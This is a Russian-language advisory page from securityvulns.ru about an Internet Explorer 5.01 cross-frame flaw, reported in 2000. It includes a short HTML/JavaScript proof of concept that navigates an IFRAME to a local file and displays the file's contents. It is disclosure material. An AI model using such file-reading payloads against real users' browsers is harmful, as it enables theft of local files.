Computer Security

Очередная дырка javascript в IE
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Очередная дырка javascript в IE
Published:07.06.2000
Source:BUGTRAQ
SecurityVulns ID:242
Type:client
Level:5/10
Описание:Сочетание метода navigate с IFRAME позволяет обратиться к локальным файлам. <IFRAME ID="I1"></IFRAME> <SCRIPT for=I1 event="NavigateComplete2(b)"> alert("Here is your file:\n"+b.document.body.innerText); </SCRIPT> <SCRIPT> I1.navigate("file://c:/test.txt"); setTimeout('I1.navigate("file://c:/test.txt")',1000); </SCRIPT>
Affected:MICROSOFT : Internet Explorer 5.01
Original documentdocumentGeorgi Guninski, IE 5 Cross-frame security vulnerability using IFRAME and WebBrowser control (07.06.2000)
Files:BugTraq ID: 1311
Discuss:Read or add your comments to this news (0 comments)
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru